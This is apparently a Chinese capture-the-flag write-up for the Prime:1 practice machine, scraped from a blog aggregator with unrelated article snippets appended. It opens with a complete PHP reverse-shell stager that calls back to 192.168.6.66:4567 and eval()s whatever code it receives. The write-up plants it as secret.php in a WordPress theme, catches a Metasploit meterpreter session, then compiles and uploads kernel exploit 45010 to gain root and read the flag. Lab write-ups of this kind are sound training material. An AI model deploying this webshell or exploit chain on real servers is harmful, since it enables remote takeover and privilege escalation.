<?php /**/ error_reporting(0); $ip = '192.168.6.66'; $port = 4567; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

复制shell
最后点击【Update File
保存成功

提示:“File edited successfully.

3.2.3.2 msf监听4567端口
──(root㉿kali)-[/home/kali/prime1]
└─# msfconsole                                                                        
Metasploit tip: Use the resource command to run commands from a file
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v6.4.1-dev                           ]
+ -- --=[ 2407 exploits - 1239 auxiliary - 422 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.6.66
LHOST => 192.168.6.66
msf6 exploit(multi/handler) > set LPORT 4567
LPORT => 4567
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.6.66:4567 

监听4567端口成功。

3.2.3.3 访问测试

测试地址:http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/secret.php
已经获得反弹shell
更多测试代码:

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > ls
Listing: /var/www/html/wordpress/wp-content/themes/twentynineteen
=================================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100644/rw-r--r--  840     fil   2018-12-14 05:33:42 -0500  404.php
100644/rw-r--r--  1229    fil   2018-12-19 06:18:26 -0500  archive.php
040755/rwxr-xr-x  4096    dir   2019-06-18 20:50:52 -0400  classes
100644/rw-r--r--  3988    fil   2018-12-14 06:25:40 -0500  comments.php
040755/rwxr-xr-x  4096    dir   2019-06-18 20:50:52 -0400  fonts
100644/rw-r--r--  1608    fil   2018-12-14 05:33:42 -0500  footer.php
100644/rw-r--r--  10035   fil   2019-01-02 21:04:50 -0500  functions.php
100644/rw-r--r--  1870    fil   2019-04-16 04:30:54 -0400  header.php
100644/rw-r--r--  2874    fil   2019-04-16 04:30:54 -0400  image.php
040755/rwxr-xr-x  4096    dir   2019-06-18 20:50:52 -0400  inc
100644/rw-r--r--  1060    fil   2018-12-19 06:18:26 -0500  index.php
040755/rwxr-xr-x  4096    dir   2019-06-18 20:50:52 -0400  js
100644/rw-r--r--  151698  fil   2018-12-14 05:33:42 -0500  package-lock.json
100644/rw-r--r--  1531    fil   2018-12-14 05:33:42 -0500  package.json
100644/rw-r--r--  765     fil   2018-12-14 05:33:42 -0500  page.php
100644/rw-r--r--  219     fil   2018-12-14 05:33:42 -0500  postcss.config.js
100644/rw-r--r--  3949    fil   2019-02-28 05:47:52 -0500  print.css
100644/rw-r--r--  3320    fil   2019-04-07 09:18:52 -0400  print.scss
100644/rw-r--r--  1735    fil   2019-05-07 22:06:56 -0400  readme.txt
040755/rwxr-xr-x  4096    dir   2019-06-18 20:50:52 -0400  sass
100644/rw-r--r--  175535  fil   2018-12-14 05:33:42 -0500  screenshot.png
100644/rw-r--r--  1344    fil   2018-12-14 05:33:42 -0500  search.php
100777/rwxrwxrwx  1111    fil   2024-06-05 10:32:55 -0400  secret.php
100644/rw-r--r--  1785    fil   2018-12-19 06:24:12 -0500  single.php
100644/rw-r--r--  159     fil   2019-01-18 21:38:50 -0500  style-editor-customizer.css
100644/rw-r--r--  158     fil   2019-01-18 21:38:50 -0500  style-editor-customizer.scss
100644/rw-r--r--  64981   fil   2019-02-13 21:40:50 -0500  style-editor.css
100644/rw-r--r--  12830   fil   2019-02-13 21:40:50 -0500  style-editor.scss
100644/rw-r--r--  212651  fil   2019-05-07 22:06:56 -0400  style-rtl.css
100644/rw-r--r--  212849  fil   2019-05-07 22:06:56 -0400  style.css
100644/rw-r--r--  2798    fil   2019-05-07 22:06:56 -0400  style.scss
040755/rwxr-xr-x  4096    dir   2019-06-18 20:50:52 -0400  template-parts

meterpreter > 

即将进行系统漏洞提权。
系统信息:Linux ubuntu 4.10.0-28-generic

3.3 Linux内核漏洞提权

3.3.1 漏洞查找

┌──(root㉿kali)-[/home/kali/prime1]
└─# searchsploit -w ubuntu 4.10.0-28
--------------------------------------------------------------------------------------------------------------- --------------------------------------------
 Exploit Title                                                                                                 |  URL
--------------------------------------------------------------------------------------------------------------- --------------------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                           | https://www.exploit-db.com/exploits/43234
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                  | https://www.exploit-db.com/exploits/45010
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                         | https://www.exploit-db.com/exploits/41760
--------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
--------------------------------------------------------------------------------------------------------------- --------------------------------------------
 Paper Title                                                                                                   |  URL
--------------------------------------------------------------------------------------------------------------- --------------------------------------------
Debian < 5.0.6 / Ubuntu < 10.04 - Webshell Remote Root Exploit                                                 | https://www.exploit-db.com/papers/15311
--------------------------------------------------------------------------------------------------------------- --------------------------------------------
                                                                                                                                                            

发现这个漏洞可以利用:
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation

──(root㉿kali)-[/home/kali/prime1]
└─# searchsploit ubuntu 4.10.0-28 
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                  |  Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                                            | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                                   | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                                                          | linux/local/41760.txt
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Paper Title                                                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Debian < 5.0.6 / Ubuntu < 10.04 - Webshell Remote Root Exploit                                                                                  | english/15311-debian--5.0.6--ubu
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
                                                                                                                                                                                  

┌──(root㉿kali)-[/home/kali/prime1]
└─# find / -name 45010.c         
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/run/user/130/gvfs’: Permission denied
/root/45010.c
/usr/share/exploitdb/exploits/linux/local/45010.c
                                                      

获得poc路径:
/usr/share/exploitdb/exploits/linux/local/45010.c

3.3.2 复制poc

┌──(root㉿kali)-[/home/kali/prime1]
└─# cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
                                                                                                                                                                                  
┌──(root㉿kali)-[/home/kali/prime1]
└─# ls
45010.c  shell.php

3.3.3 编译poc文件

参考cve-2017-16995官方文档执行编译。

┌──(root㉿kali)-[/home/kali/prime1]
└─# gcc 45010.c -o 45010 -static
                                                                                                                                                                                  
┌──(root㉿kali)-[/home/kali/prime1]
└─# ls
45010  45010.c  shell.php
                                                                                                                                                                                  

3.3.4 上传编译poc

meterpreter > upload /home/kali/prime1/45010 /tmp/45010
[*] Uploading  : /home/kali/prime1/45010 -> /tmp/45010
[*] Uploaded -1.00 B of 752.41 KiB (0.0%): /home/kali/prime1/45010 -> /tmp/45010
[*] Completed  : /home/kali/prime1/45010 -> /tmp/45010
meterpreter > cd /tmp
meterpreter > ls
Listing: /tmp
=============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  .ICE-unix
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  .Test-unix
100444/r--r--r--  11      fil   2024-06-05 10:08:17 -0400  .X0-lock
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:17 -0400  .X11-unix
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  .XIM-unix
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  .font-unix
100644/rw-r--r--  770472  fil   2024-06-05 11:10:37 -0400  45010
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  VMwareDnD
040700/rwx------  4096    dir   2024-06-05 10:08:28 -0400  systemd-private-7d99593754664a1a84c9bcbf4d955b30-colord.service-IA7clY
040700/rwx------  4096    dir   2024-06-05 10:08:24 -0400  systemd-private-7d99593754664a1a84c9bcbf4d955b30-rtkit-daemon.service-KTk3vv
040700/rwx------  4096    dir   2024-06-05 10:08:11 -0400  systemd-private-7d99593754664a1a84c9bcbf4d955b30-systemd-timesyncd.service-bXOvLg
040700/rwx------  4096    dir   2024-06-05 10:08:13 -0400  vmware-root

日志显示已经成功上传。

3.3.5 执行编译poc

3.3.5.1 目录切换
meterpreter > cd /tmp
3.3.5.2 赋予可执行权限
meterpreter > chmod +x 45010
meterpreter > ls
Listing: /tmp
=============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  .ICE-unix
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  .Test-unix
100444/r--r--r--  11      fil   2024-06-05 10:08:17 -0400  .X0-lock
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:17 -0400  .X11-unix
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  .XIM-unix
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  .font-unix
100000/---------  770472  fil   2024-06-05 11:10:37 -0400  45010
041777/rwxrwxrwx  4096    dir   2024-06-05 10:08:11 -0400  VMwareDnD
040700/rwx------  4096    dir   2024-06-05 10:08:28 -0400  systemd-private-7d99593754664a1a84c9bcbf4d955b30-colord.service-IA7clY
040700/rwx------  4096    dir   2024-06-05 10:08:24 -0400  systemd-private-7d99593754664a1a84c9bcbf4d955b30-rtkit-daemon.service-KTk3vv
040700/rwx------  4096    dir   2024-06-05 10:08:11 -0400  systemd-private-7d99593754664a1a84c9bcbf4d955b30-systemd-timesyncd.service-bXOvLg
040700/rwx------  4096    dir   2024-06-05 10:08:13 -0400  vmware-root

3.3.5.3 执行编译文件
meterpreter > shell
Process 6025 created.
Channel 2 created.
ls
45010
VMwareDnD
systemd-private-7d99593754664a1a84c9bcbf4d955b30-colord.service-IA7clY
systemd-private-7d99593754664a1a84c9bcbf4d955b30-rtkit-daemon.service-KTk3vv
systemd-private-7d99593754664a1a84c9bcbf4d955b30-systemd-timesyncd.service-bXOvLg
vmware-root
./45010
whoami
root
find / -name *root*
/tmp/vmware-root
find: '/run/user/108/gvfs': Permission denied
cd /root
ls
enc
enc.cpp
enc.txt
key.txt
root.txt
sql.py
t.sh
wfuzz
wordpress.sql
cat root.txt
b2b17036da1de94cfb024540a8e7075a

获得flag:
b2b17036da1de94cfb024540a8e7075a


渗透总结

在本次prime:1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、wfuzz爆破、wpscan、msf、netcat、反弹shell、linux内核提权,并获得flag等内容:

  • 使用nmap进行主机发现和端口扫描
  • 使用dirbsearch进行目录扫描
  • 网页分析,进行wfuzz爆破参数和值
  • netcat监听
  • 反弹shell
  • linux内核提权,获得flag

参考文章

  • prime:1靶场
  • arp-scan使用
  • Netdiscover基本使用
  • nmap详细使用教程
  • 黑客工具之whatweb详细使用教程
  • dirsearch - Web path discovery
  • Netcat - 你需要知道的一切
  • cve-2017-16995
  • searchsploit漏洞查找工具使用指南(exploit-db.com 离线工具 exploitdb)
  • WFUZZ使用教程
  • prime-1渗透测试流程图

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1792311.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

RPA机器人的技术挑战与解决方案

RPA在企业转型过程中彰显出巨大的潜力&#xff0c;每年为企业节省大量人力以及运营成本&#xff0c;从而实现企业经营的降本提质增效。但要成功部署和实施RPA&#xff0c;需要专业人员、流程和技术的精心组合。企业管理者需要根据自己的实际需求&#xff0c;选择一个稳定可靠、…

Hadoop3:MapReduce之InputFormat数据输入过程整体概览(0)

一、MapReduce中数据流向 二、MapTask并行度 1、原理概览 数据块&#xff1a;Block是HDFS物理上把数据分成一块一块。数据块是HDFS存储数据单位。 数据切片&#xff1a;数据切片只是在逻辑上对输入进行分片&#xff0c;并不会在磁盘上将其切分成片进行存储。数据切片是MapRed…

Python私教张大鹏 Vue3 整合 Ant Design Vue

创建项目 npm create vite启动项目 cd vue3_antdesignvue pnpm i pnpm dev使用webstorm打开项目 配置启动 整合AntDesignVue 安装依赖&#xff1a; pnpm install ant-design-vue pnpm install unplugin-vue-components -D修改 vite.config.js import {defineConfig} from …

HarmonyOS鸿蒙-DevEco Studio工具

一、官网下载DevEco Studio工具地址 文章内容: 1、下载工具 2、运行项目 3、安装启动器 https://developer.harmonyos.com/cn/develop/deveco-studio/https://developer.harmonyos.com/cn/develop/deveco-studio/ 下载不同平台工具目录 : 二、 安装DevEco Studio工具 安装的配置…

Three.js中的Raycasting技术:实现3D场景交互事件的Raycaster详解

前言 在Web开发中&#xff0c;Three.js是一个极为强大的库&#xff0c;它让开发者能够轻松地在浏览器中创建和展示3D图形。随着3D技术在网页设计、游戏开发、数据可视化等领域的广泛应用&#xff0c;用户与3D场景的交互变得日益重要。而要实现这种交互&#xff0c;一个核心的技…

PID算法在电机速度控制上的应用

目录 概述 1 系统硬件框架 1.1 框架介绍 1.2 硬件实物图 2 STM32Cub生成工程 2.1 软件版本信息 2.2 配置参数 ​编辑2.3 生成项目 3 PID算法实现 3.1 概念 3.2 代码实现 4 其他功能实现 4.1 设置电机速度 4.2 PID算法控制电机 4.3 功能函数的调用 5 测试 5.1 …

Dell戴尔XPS 16 9640 Intel酷睿Ultra9处理器笔记本电脑原装出厂Windows11系统包,恢复原厂开箱状态oem预装系统

下载链接&#xff1a;https://pan.baidu.com/s/1j_sc8FW5x-ZreNrqvRhjmg?pwd5gk6 提取码&#xff1a;5gk6 戴尔原装系统自带网卡、显卡、声卡、蓝牙等所有硬件驱动、出厂主题壁纸、系统属性专属联机支持标志、系统属性专属LOGO标志、Office办公软件、MyDell、迈克菲等预装软…

Renesas MCU之SCI_SPI接口驱动LCD

目录 概述 1 软硬件介绍 1.1 软件版本信息 1.2 ST7796-LCD 1.3 MCU IO与LCD PIN对应关系 2 FSP配置项目 2.1 配置项目参数 2.2 生成项目框架 3 代码实现 3.1 SPI的库函数 3.1.1 R_SCI_SPI_Open() 3.1.2 R_SCI_SPI_Read() 3.1.3 R_SCI_SPI_Write() 3.2 应用函数…

地理信息系统(ArcGIS)在水文水资源、水环境中的实践技术应用及案例分析教程

原文链接&#xff1a;地理信息系统&#xff08;ArcGIS&#xff09;在水文水资源、水环境中的实践技术应用及案例分析教程https://mp.weixin.qq.com/s?__bizMzUzNTczMDMxMg&mid2247606047&idx5&sn8c9701518e13b85d8429186fcfe98ad8&chksmfa821ef8cdf597ee7a8a1…

容器环境中安全性的演变

近年来&#xff0c;容器已成为现代IT基础设施中不可或缺的一部分。它们在部署应用程序时提供了极大的灵活性和效率。 然而&#xff0c;随着容器化的普及&#xff0c;保护这些环境的需求也随之增长。容器安全被定义为在容器化环境中防范威胁并确保符合安全标准。它已成为解决使…

Android音频API介绍

Android系统提供了四个层面的音频API&#xff1a; Java层MediaRecorder&MediaPlayer系列&#xff1b;Java层AudioTrack&AudioRecorder系列&#xff1b;Jni层opensles&#xff1b;JNI层AAudio&#xff08;Android O引入&#xff09; 下面分别介绍这些API的使用及特点。…

Ubuntu18.04 文件管理器无法打开的解决方法

问题&#xff1a;打开Ubuntu虚拟机发现文件管理器无法打开,一直在转圈圈 在终端中输入 nautilus 显示如下信息 nautilus: symbol lookup error: /usr/lib/x86_64-linux-gnu/tracker-2.0/libtracker-data.so.0: undefined symbol: sqlite3_bind_pointer 解决措施&#xff1a…

【quarkus系列】实战自定义注解实现策略模式分发

目录 序言自定义注解业务接口渠道消息实现策略分发测试知识扩展AnyAnnotationLiteral 应用场景和语法 序言 策略模式大家都应该了解或者使用过&#xff0c;此篇文章中就不再阐述&#xff0c;之前springboot项目中小编也真正的实战应用过。现在换Quarkus框架开发项目&#xff0…

【数据库】MySQL概述(初阶)

文章目录 一、mysql概述1、数据库基本概念&#xff1a;2. 数据模型2.1 关系型数据库2.2 理解数据模型 更多数据库MySQL系统内容就在以下专栏&#xff1a; 专栏链接&#xff1a;数据库MySQL 一、mysql概述 1、数据库基本概念&#xff1a; 数据库&#xff1a; 数据存储的仓库。数…

自然语言处理(NLP)—— 神经网络语言处理

1. 总体原则 1.1 深度神经网络&#xff08;Deep Neural Network&#xff09;的训练过程 下图展示了自然语言处理&#xff08;NLP&#xff09;领域内使用的深度神经网络&#xff08;Deep Neural Network&#xff09;的训练过程的简化图。 在神经网络的NLP领域&#xff1a; 语料…

winscp无法上传,删除,修改文件并提示权限不够的分析

使用winscp删除文件,报了个错如下 根据这个错就去百度,网上大部分都是通过下面这种方法解决: 在winscp端进行设置 输入主机名(即IP地址)、用户名和密码,然后点击高级 在箭头所指位置输入sudo + sftp应用程序的路径 先查询 sudo find / -name sftp-server -print点击Sh…

C语言课程设计-抽奖系统

请勿直接引用&#xff0c;此内容为本人课程设计报告&#xff0c;上传意为记录自己的经历 题目&#xff1a;基于C语言的抽奖系统 摘要&#xff1a; 本文介绍了一种基于C语言的简易抽奖系统的设计与实现。系统通过用户输入与随机数生成技术相结合&#xff0c;模拟现实中的抽奖…

【渗透测试】DC-1靶机实战(下)SSH爆破提权

【渗透测试】DC-1靶机实战&#xff08;上&#xff09;漏洞扫描获取反弹shell-CSDN博客 7.SSH爆破 hydra ssh://172.20.10.4 -l flag4 -P /usr/share/john/password.lst -t 64 -f -vV -o /tmp/hydra.sshssh://10.10.10.31&#xff1a;指定了要攻击的 SSH 服务的地址。 -l flag…

Windows开启远程桌面

搜索并进入【远程桌面设置】 ​​ 开启远程桌面 ​​​ ipconfig​命令查看ip地址&#xff0c;并使用地址在另一台电脑远程登录此电脑 选择其他账户登录&#xff0c;输入用户和密码 ​​ ​​ 成功登录 ​​

基于Django+MySQL的智慧校园系统

此项目基于Django MySQL HTML CSS JS jQuery bootstrap实现的功能有 学生管理部门管理代办清单管理校园论坛校园医疗服务校园看点校园生活助手常用功能入口 1. 一些注意点 1. 页面body会自动有一些边界距&#xff0c;处理方法&#xff1a; <head><style>b…